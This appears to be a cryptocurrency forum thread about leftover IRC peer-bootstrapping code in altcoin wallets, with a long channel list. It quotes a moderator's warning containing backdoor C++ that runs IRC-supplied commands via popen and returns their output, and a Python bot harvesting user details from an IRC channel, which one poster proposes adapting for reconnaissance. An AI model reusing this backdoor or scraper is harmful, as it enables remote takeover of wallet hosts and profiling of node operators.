Old IRC code in shitcoins "IRC bootstrapping"

[garmin]

I was trying to sync a shitcoin and accidentally found I was connected to IRC when looking in my debug.log file

I usualy add IRC=0 to my conf file to avoid this issue but while troubleshooting a sync problem I found this.

use IRC to connect to pelican.heliacal.net and do a /list to see all the connections from old wallets and left over code
in shitcoin clones using IRC bootstrapping.

Here is some info on the topic, but it's very old, I think many may be unaware of this connection in the background.

https://bitcointalk.org/index.php?topic=84.0

Opinions?

[1714065027]

1714065027

[1714065027]

1714065027

[1714065027]

1714065027

[1714065027]

1714065027

[garmin]

can this backdoor be used to ddos wallets, nodes? 

/list from IRC server

#namecoin01   254   
#namecoin00   245   
#novacoin00   196   
#HyperStake00   95   
#magi00   94   
#AuroraCoin00   89   
#MintCoin00   76   
#tekcoin00   74   
#devcoin   68   
#eMark00   67   
#ultracoin24   64   
#Hyper00   63   
#Latium00   62   
#rimbit00   59   
#Diamond00   51   
#netcoin00   50   
#Truckcoin00   48   
#4200   48   
#M3GAC01N01   47   
#curecoin00   46   
#Zeitcoin00   46   
#noblecoin00   44   
#TagCoin00   42   
#sexcoin00   42   
#DNotes00   41   
#anoncoin00   39   
#orbitcoin00   38   
#CryptogenicBullion00   38   
#AsiaCoin00   37   
#mavro00   37   
#CAPTcoin00   36   
#yacoin24   35   
#phoenixcoin00   34   
#digitalcoin00   33   
#Whitecoin00   33   
#bbqcoin00   32   
#BlueCoin00   32   
#TittieCoin00   31   
#emerald00   30   
#infinitecoin00   29   
#grandcoin00   29   
#usde00   29   
#lottocoin00   29   
#luckycoin00   28   
#Philosopherstone00   28   
#litecoin00   28   
#fastcoin00   25   
#Battlecoin00   24   
#globalcoin200   24   
#chncoin00   23   
#dogecoin00   23   
#Aricoin00   23   
#dopecoin00   22   
#StableCoin00   22   
#Teslacoin00   21   
#huntercoin01   21   
#alphacoin00   20   
#X11Coin00   19   
#lycancoin280   18   
#FairCoin00   18   
#nyancoin200   18   
#OmniCoin00   18   
#IncaKoin00   18   
#huntercoin00   17   
#Cetus00   17   
#JackpotCoin00   16   
#iCoin00   16   
#bitcoin200   16   
#BitcoinFast00   15   
#Coino00   15   
#ECCoin2000   15   
#KiwiCoin00   15   
#sdcoin00   15   
#StarCoin00   14   
#BitMiles200   14   
#Bitstar00   14   
#Coin2.100   13   
#pennies-696924   13   
##camorracoin00   13   
#florincoin00   12   
#Ocoin00   12   
#MetalMusicCoin00   12   
#redcoin00   12   
#elephantcoin00   12   
##growcoin00   12   
#silkchat   12   
#ybcoin24   12   
#copperlark00   12   
#americancoinCOM00   12   
#hempcoin00   11   
#KryptKoin00   11   
#OrangeCoin00   11   
#feathercoin00   11   
#6600   11   
#craftcoin200   11   
#DolphinCoin00   10   
#RippleLite00   10   
#Argentum00   10   
#doubloons00   10   
#krugercoin00   10   
#abcittCoin00   10   
#xtracoinxx00   10   
#halcyon00   9   
#InfinitecoinV200   9   
#MediCoin00   9   
#bitcoin   9   see #bitcoin-dev or #bitcoin-dev on freenode
#Grain00   9   
#abcittCoin01   9   
#bitgem00   9   
#alipaycoin00   9   
#worldcoin00   9   
#GCoin00   9   
#elacoin2-01   8   
#BatCoin00   8   
#copperlark02   8   
#paccoin00   8   
#PreminePlus00   8   
#galaxycoin00   8   
#cagecoin00   8   
#FailCoin200   8   
#AndroidsTokensv200   8   
#getnibble00   7   
#LegendaryCoin00   7   
##darkshibe00   7   
#zccoin24   7   
#MemeCoin00   7   
#Credits00   7   
#HeisenbergHex00   7   
#aliencoininvasion00   7   
#TrollCoin00   7   
#Noirbits200   7   
#diemcoin00   7   
#fluttercoin00   7   
#bitcoinplus00   7   
#eXcryptoTEST   7   
#cachecoin24   7   
#SaturnCoinx00   7   
#CommunityCoin00   7   
#TopCoin200   7   
#likecoin200   6   
#ImperialCoin200   6   
#CivilizationCoin00   6   
#ixcoin02   6   
#ixcoin01   6   
#PenguinCoin01   6   
#LxcCoin00   6   
#Roscoin00   6   
#Badgercoin00   6   
#namecoinTEST   6   
#Extremecoin200   6   
#junkcoin00   6   
#beaocoin00   6   
#xencoin00   6   
#zedcoin00   5   
#ekrona00   5   
#gmecoin01   5   
#dimecoin00   5   
#ixcoin00   5   
#ixcoin03   5   
#ixcoin08   5   
#crtcoin00   5   
#GameLeagueCoin00   5   
#copperlark01   5   
#earthcoin00   5   
#ECCoin00   5   
#ermiscoin00   5   
#ixcoin09   5   
#NoirShares00   5   
#IRCoin00   4   
#ixcoin06   4   
#groincoin00   4   
#Cash00   4   
#CryptoBuck00   4   
#CannabisDarkcoin00   4   
#RainbowGoldCoin00   4   
#CoffeeCoin2.000   4   
#TheSmurfsCoin00   4   
#BTCtalkcoin00   4   
#GoldRushCoin00   4   
#LoveCoin00   4   
#wildwestcoin00   4   
#Newsaturncoin200   4   
#8400   4   
#Sembros00   4   
#Denarius200   3   
#GreeceCoin00   3   
#axron00   3   
#zombiecoin275   3   
#Vaultcoin00   3   
#bitlira200   3   
#YellowCoin00   3   
#FutCoinTEST   3   
#pigcoin00   3   
#nanotoken00   3   
#solarcoin00   3   
#Thorcoin24   3   
#mincoin00   3   
#urodark00   3   
#BoomCoin00   3   
#CarbonCoin00   3   
#terracoinTEST3   3   
#ixcoin07   3   
#litebar00   3   
#magiTEST2   3   
#Tmgcoinxx00   3   
#realcoin00   3   
#Muniti00   3   
#CosmosCoin00   3   
#beercoin00   3   
#LasagnaCoin00   3   
#SourceCoin00   3   
#noblecoinTEST2   3   
#FinerCoin120   2   
#vampirecoin285   2   
#UNCoin00   2   
#abcinnCoin00   2   
#Cubits00   2   
#torcoin00   2   
#dogecoin18   2   
#dogecoin13   2   
#novacoinTEST2   2   
#darsek00   2   
#xg00   2   
#dogecoin34   2   
#T1TAN10M01   2   
#EuropeCoin00   2   
#topcoin00   2   
#Mozztestcoin00   2   
#Equal00   2   
#BEEV200   2   
#CapitalCoin01   2   
#huntercoinTEST   2   
#spots00   2   
#solidcoin69   2   
#UniversityCoin00   2   
#ixcoin05   2   
#PayCoin00   2   
#dogecoin31   2   
#dogecoin32   2   
#dogecoin38   2   
#dogecoin45   2   
#dogecoin41   2   
#homecoin00   2   
#dogecoin22   2   
#dogecoin29   2   
#billioncoin00   2   
#Firecoin00   2   
#nightmare00   2   
#corgicoin05   2   
#CryptoCredits00   2   
#voxpopuli00   2   
#SoleCoin00   2   
#YouthCoinxx00   2   
#IGCCoin_v1_00   2   
#ultracoinTEST   2   
#dollarpounds00   2   
#ecoin00   2   
#pandacoins24   2   
##ShadeCoin   2   
#polishcoin200   2   
#Ethan00   2   
#ccoin200   2   
#asspennies200   2   
#containercoin00   2   
#blazecoin00   2   
#bitcoinTEST   2   
#Distrocoin00   2   
#FairCoinBETA00   2   
#newyorkc42   2   
#dCom00   2   
#dollar17   2   
#bitcoin77   2   
#newyorkc22   2   
#newyorkc20   2   
#GameCrypto00   2   
#BottleCaps00   2   
#Mozzsharevv200   2   
#laika   2   
#BYCoinz00   2   
#powercoin01   1   
#educoin46   1   
#leprocoin00   1   
#gpl24   1   
#terracoin11   1   
#terracoin71   1   
#planecoin00   1   
#HoboNickels00   1   
#snowcoin00   1   
#koruna19   1   
#corgicoin47   1   
#terracoin25   1   
#abRhinoCoin00   1   
#Citizencoin00   1   
#litecoinTEST3   1   
#travelcoinproject00   1   
#indexcoinproject00   1   
#shitcoin00   1   
#gldcoin00   1   
#CoolCoin00   1   
#smartcoin200   1   
#AngelCoinxx00   1   
#g8coin00   1   
#samcoin   1   
#PayzorCoin00   1   
#groupcoin   1   
#Happycoin00   1   
#CloakCoinTEST4   1   
##aurovine00   1   
#Rekt00   1   
#gaycoin28   1   
#glcoin200   1   
#olympiccoin00   1   
#gaycoin18   1   
#Applecoin24   1   
#indiecreddit00   1   
#Nicecoin00   1   
#abFBcoin00   1   
#nlocoin200   1   
#koruna39   1   
#GOODcoin03   1   
#GOODcoin02   1   
#internetcoin00   1   
#SquareBit00   1   
#eaglecoin200   1   
#koruna44   1   
#Thebotcoin200   1   
#fairbrix01   1   
#GhostCoin00   1   
#hypercoin200   1   
#conemu   1   
#getseedcoin00   1   
#AmberCoin00   1   
#copperbars24   1   
#graphene24   1   
#coinyecoin02   1   
#coinyecoin05   1   
#coinyecoin04   1   
#coinyecoin07   1   
#coinyecoin08   1   
#fuelcoin00   1   
#icecoin200   1   
#NorthKoreaCoin200   1   
#chakracoin00   1   
#albocoin22   1   
#albocoin21   1   
#coinyecoin40   1   
#coinyecoin12   1   
#coinyecoin11   1   
#bitcash00   1   
#pawncoin47   1   
#pawncoin49   1   
#StoopidCoin00   1   
#albocoin48   1   
#bells00   1   
#binarycoin00   1   
#aluminiumcoin00   1   
#XXLcoin25   1   
#ezcoin01   1   
#XXLcoin30   1   
#XXLcoin39   1   
#oilcoin00   1   
#rabbitcoin27   1   
#EBT00   1   
#rabbitcoin30   1   
#rabbitcoin31   1   
#rabbitcoin33   1   
#rabbitcoin38   1   
#ztc127   1   
#LotteryTickets24   1   
#dogecoin19   1   
#dogecoin14   1   
#dogecoin16   1   
#dogecoin10   1   
#coinyecoin30   1   
#coinyecoin32   1   
#NumberCoin00   1   
#coinyecoin23   1   
#coinyecoin22   1   
#i0coin00   1   
#Digittwo03   1   
#BanxTEST2   1   
#kittehcoin10   1   
#dicecoin00   1   
#cleanwatercoin00   1   
#Jerkycoin00   1   
#rabbitcoin19   1   
#XXLcoin16   1   
#rabbitcoin47   1   
#rabbitcoin46   1   
#LightCoin00   1   
#mooncoin24   1   
#mooncoin25   1   
#AurumGoldCoin00   1   
#BountyCoin00   1   
#Lucky7Coin00   1   
#CannaCoin00   1   
#BeliCoin00   1   
#novacoinTEST   1   
#pacycoin43   1   
#bitcoin93   1   
#bitcoin97   1   
#bitcoin96   1   
#frozenboxcoin200   1   
#goalcoin00   1   
#666Coin00   1   
#fixcoin200   1   
#FloridaCoin11   1   
#Gil00   1   
#dollar07   1   
#dollar24   1   
#AltCheck00   1   
#dollar32   1   
#dollar37   1   
##audiocoin00   1   
#AphroditeCoin00   1   
#JackpotCoinTEST2   1   
#educoin25   1   
#Radioactivecoin24   1   
#schillingcoin42   1   
#geistgeld00   1   
#ixcoin04   1   
#CalypsoCoin00   1   
#sdcoinTEST   1   
#vericoin02   1   
#EonCoin00   1   
#koin22   1   
#HorseCoin00   1   
#KyushuCoin201   1   
#KyushuCoin204   1   
#Velocitycoin24   1   
#seedcoinlite24   1   
#CapitalCoin00   1   
#plusevcoin200   1   
#noblecoinTEST3   1   
#KyushuCoin01   1   
#upcoin00   1   
#DistroBlitz00   1   
#volatilitycoin00   1   
#dogecoin09   1   
#dogecoin01   1   
#dogecoin05   1   
#corgicoin02   1   
#dogecoin04   1   
#dogecoin36   1   
#dogecoin37   1   
#dogecoin30   1   
#dogecoin48   1   
#blackcoin03   1   
#blackcoin00   1   
#bitcoin-dev   1   
#dogecoin26   1   
#dogecoin21   1   
#dogecoin28   1   
#Coin2.000   1   
#CCIShare00   1   
#SeedcoinX00   1   
#richcoin00   1   
#TrustCoin00   1   
#Electric29   1   
#cachecoinTEST   1   
#bitcoin87   1   
#bitcoin84   1   
#bitcoin85   1   
#runnercoin00   1   
#educoin14   1   
#bitcoin29   1   
#bitcoin27   1   
#suncoin200   1   
#royalcoin00   1   
#bitcoin01   1   
#bitcoin07   1   
#bitcoin09   1   
#newyorkc43   1   
#bitcoin47   1   
#bitcoin43   1   
#pastacoin00   1   
#bitcoin59   1   
#jbcoin24   1   
#bitcoin39   1   
#MasterCoin200   1   
#dollar45   1   
#martexcoin200   1   
#bitcoin64   1   
#bitcoin68   1   
#bitlion01   1   
#surge49   1   
#newyorkc30   1   
#ladycoin00   1   
#newyorkc24   1   
#digibyte00   1   
#newyorkc04   1   
#newyorkc06   1   
#newyorkc07   1   
#newyorkc03   1   
#newyorkc15   1   
#newyorkc12   1   
#foxcoin200   1   
#payprocoin01   1   
#abclscCoin00   1   
#dollarcoin39   1   
#macrocoin00   1   
#corgicoin37   1   
#corgicoin36   1   
#crapcoin200   1   
#corgicoin20   1   
#herocoinme2411   1   
#ECCoin1337   1   
#pacycoin11   1   
#lfnet   1   
#BorzoCoin00   1

[ronald98]

Architectcoin implemented built-in IRC chatting in the ARCH wallet, but it's the only coin I know that implemented it.

https://bitcointalk.org/index.php?topic=695857.0

[garmin]

Architectcoin implemented built-in IRC chatting in the ARCH wallet, but it's the only coin I know that implemented it.

https://bitcointalk.org/index.php?topic=695857.0

I think it's old seed node info coded into all the wallet clones. Not so much a IRC feature.
The old node info used IRC bootstrap to sync. you can remove all nodes from incakoin [NKA] .conf and it still connects
via this old bootstrap method used in the coin it was cloned from.

I do notice when I have misbehaving nodes they are usually IRC nodes.

It seems as if this backdoor connection could be exploited, by evil doers...

Any opinions?   

[microbial]

it is like a who is who of shitcoins 

[fsb4000]

In many coins IRC left as an additional source nodes.
For example, Novacoin has:
1) IRC
2) DNS seed nodes https://github.com/novacoin-project/novacoin/blob/master/src/net.cpp#L1099
3) Seed nodes https://github.com/novacoin-project/novacoin/blob/master/src/net.cpp#L1173
4) Tor seed nodes https://github.com/novacoin-project/novacoin/blob/master/src/net.cpp#L1194

[jasemoney]

I recall that it was just another way for nodes to find each other. Many of the newer coins have eliminated this as though I don't recall it being exploited yet, its not necessary, and we've moved past it in most sources i think so its a non issue

[garmin]

I recall that it was just another way for nodes to find each other. Many of the newer coins have eliminated this as though I don't recall it being exploited yet, its not necessary, and we've moved past it in most sources i think so its a non issue

I was thinking someone could bot attack from the IRC side or ddos the node used in the native code to stop or studder a coins blockchain. while everyone is having sync issues you can dump your coins. or a IRC IP dump looking for c$ or any shares or vulnerability scans against all ip's 

[ronald98]

I recall that it was just another way for nodes to find each other. Many of the newer coins have eliminated this as though I don't recall it being exploited yet, its not necessary, and we've moved past it in most sources i think so its a non issue

I was thinking someone could bot attack from the IRC side or ddos the node used in the native code to stop or studder a coins blockchain. while everyone is having sync issues you can dump your coins. or a IRC IP dump looking for c$ or any shares or vulnerability scans against all ip's 

You are right, I just noticed the alt section mod stickied a warning about malware attacks. The warning includes an IRC exploit someone tried here.

..............

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
	CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		CFree(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
	}
}

here is the source code with macros resolved:

Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
	FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		pclose(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
	}
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

[BCwinning]

it is like a who is who of shitcoins 

which is why bitcoin is in the list and namecoin is not a shitcoin either.
but hell no one on here cares anymore what a coin is about. THey just want to the moon make me rich naow

[siameze]

This is the exploit I remember, required a very precise set of conditions. http://genesysguru.com/blog/blog/2011/06/17/bitcoin-theft-the-top-ten-threats/

There was another PoS coin that someone told me had the recent irc exploit. One of those that had the built-in chat, but I don't recall the name.

[garmin]

This is the exploit I remember, required a very precise set of conditions. http://genesysguru.com/blog/blog/2011/06/17/bitcoin-theft-the-top-ten-threats/

There was another PoS coin that someone told me had the recent irc exploit. One of those that had the built-in chat, but I don't recall the name.

interesting link, kinda what I was thinking but fleshed out.
as the duck swims atop the pond little does he know the shark below is watching him paddle away 

[jasemoney]

i dont think ddos'ing the irc nodes would do to much, they have connections aside form just the irc coded peerfinder.
also that relaunch coin backdoored it in the code, ther were not able to attack the coin based on normal irc bootstraping protocol.
im sure something nefarious could be done but i guess we might have to wait around til someone comes up with it :/

[garmin]

What about something like this

################################################################################
# bitmon
# Description: monitors irc.lfnet.org:6667#bitcoin and extracts user details
# Author: Brendan Coles <bcoles@gmail.com>
# Version: 0.1-20110520
################################################################################
import socket, string
 
botname = 'u1rt6zQzvGpS1Zz'  # change this
channel = '#bitcoin'
network = 'irc.lfnet.org'
port = 6667
irc = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
irc.connect ( ( network, port ) )
irc.send ( 'NICK %s\r\n' % (botname))
irc.send ( 'USER %s 8 * : %s\r\n' % (botname, botname))
irc.send ( 'JOIN %s\r\n' % (channel) )
 
while (1):
   data = irc.recv ( 4096 )
   msg = string.split(data)
 
   # Respond to PING X request with PONG X
   if msg[0] == 'PING':
      irc.send ( 'PONG ' + msg[1] + '\r\n' )
 
   # Send WHO request to each NICK that joins the channel
   if msg [1] == 'JOIN':
      message = ':'.join ( data.split ( ':' ) [ 2: ] )
      nick = msg[0][:string.find(msg[0],"!")]
      irc.send ( 'WHO %s\r\n' % (nick))
 
   # Write WHO data to file
   if msg [1] == '352':
      user = string.join(string.split(data[:string.find(data,"\n")])[4:])
      print user
      filetxt = open('users.txt', 'a+')
      filetxt.write(user+"\n")
      filetxt.flush()

https://gist.github.com/bcoles/982695

I found maxminers.net kinda easy by hand from the IRC side of #INCAKOIN00  user > u36KUV4d5N1JfDD = https://nka.maxminers.net/index.php

the code above could prolly make quick work of finding the interesting stuff with a few mods =)

[siameze]

There is a reason I stayed on Bitcoin until I have found Monero, this is one of them, the number of unpatched and dumb code in shitcoins is as alarming as unsurprising.

I would love to see a chart with the list of coins that have this or similar problems.